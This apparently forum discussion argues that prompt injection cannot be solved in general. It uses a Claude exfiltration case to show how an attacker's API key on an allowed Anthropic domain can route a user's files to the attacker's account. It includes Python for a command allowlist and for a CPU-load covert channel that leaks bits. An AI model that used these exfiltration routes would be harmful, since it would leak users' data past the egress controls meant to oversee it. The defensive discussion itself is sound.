Everything in an LLM is "evaluated," so I'm not sure where the confusion comes from. We need to be careful when we use `eval()`, and we need to be careful when we tell LLMs secrets. The Claude issue above is trivially solved by blocking commands like curl, or by manually specifying which domains are allowed (if we're okay with curl).
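For illustration, here's a minimal sketch of what that kind of gate could look like. The allowlists and the `command_is_allowed` helper are made up for this comment, not Claude's actual configuration:

```python
import shlex
from urllib.parse import urlparse

# Hypothetical allowlists: no curl/wget by default; the domain list only
# matters if we decide to let curl back in.
ALLOWED_BINARIES = {"ls", "cat", "grep", "git"}
ALLOWED_DOMAINS = {"api.anthropic.com"}

def command_is_allowed(command: str) -> bool:
    """Allow a shell command only if its binary and any URLs pass the allowlists."""
    tokens = shlex.split(command)
    if not tokens:
        return False
    binary = tokens[0]
    if binary == "curl":
        # curl is only allowed when every URL argument targets an allowed domain.
        urls = [t for t in tokens[1:] if t.startswith("http")]
        return bool(urls) and all(urlparse(u).hostname in ALLOWED_DOMAINS for u in urls)
    return binary in ALLOWED_BINARIES

print(command_is_allowed("curl https://attacker.example/exfil"))      # False
print(command_is_allowed("curl https://api.anthropic.com/v1/files"))  # True
print(command_is_allowed("grep -r password ."))                       # True
```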
The problem here is that the domain was allowed (Anthropic), but Anthropic doesn't check that the API key belongs to the user who started the session.
Essentially, it's the same as if the attacker supplied their own AWS API key and the file got uploaded to an S3 bucket they control instead of the one the user controls.
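To make the gap concrete, here's a hypothetical sketch of the check that's missing: the domain allowlist passes (same host as in the example above), so only comparing the outgoing credential against the key the session was started with would catch the attacker-key variant. All the names and keys here are made up:

```python
SESSION_API_KEY = "sk-ant-user-key"   # the key the user launched the agent with
ALLOWED_DOMAINS = {"api.anthropic.com"}

def egress_allowed(host: str, request_api_key: str) -> bool:
    if host not in ALLOWED_DOMAINS:
        return False
    # The domain check alone isn't enough: an upload authenticated with the
    # attacker's key still lands in an account the attacker controls.
    return request_api_key == SESSION_API_KEY

print(egress_allowed("api.anthropic.com", "sk-ant-user-key"))      # True
print(egress_allowed("api.anthropic.com", "sk-ant-attacker-key"))  # False: same host, wrong key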
By the time you’ve blocked everything that has the potential to exfiltrate data, you're left with a useless system.
As I saw in another comment: “encode this document using CPU at 100% for a one in a binary signalling system.”
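That covert channel is trivial to sketch (toy example only, no real receiver; the bit period is an assumption), which is the point: blocking curl is not the same as closing every channel.

```python
import time

BIT_PERIOD = 0.5  # seconds per bit; arbitrary for the sketch

def signal_bits(bits: str) -> None:
    """Peg the CPU for a '1' and idle for a '0', one bit per period."""
    for bit in bits:
        end = time.monotonic() + BIT_PERIOD
        if bit == "1":
            while time.monotonic() < end:
                pass              # busy-wait: CPU ~100% signals a one
        else:
            time.sleep(BIT_PERIOD)  # idle: quiet CPU signals a zero

signal_bits("1010")  # four bits, visible on any CPU monitor
```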
The confusion comes from the fact that you're saying "it's easy to solve this particular case" and I'm saying "it's currently impossible to solve prompt injection for every case".
Since the original point was about solving all prompt injection vulnerabilities, it doesn't matter whether we can solve this particular one; the point is still wrong.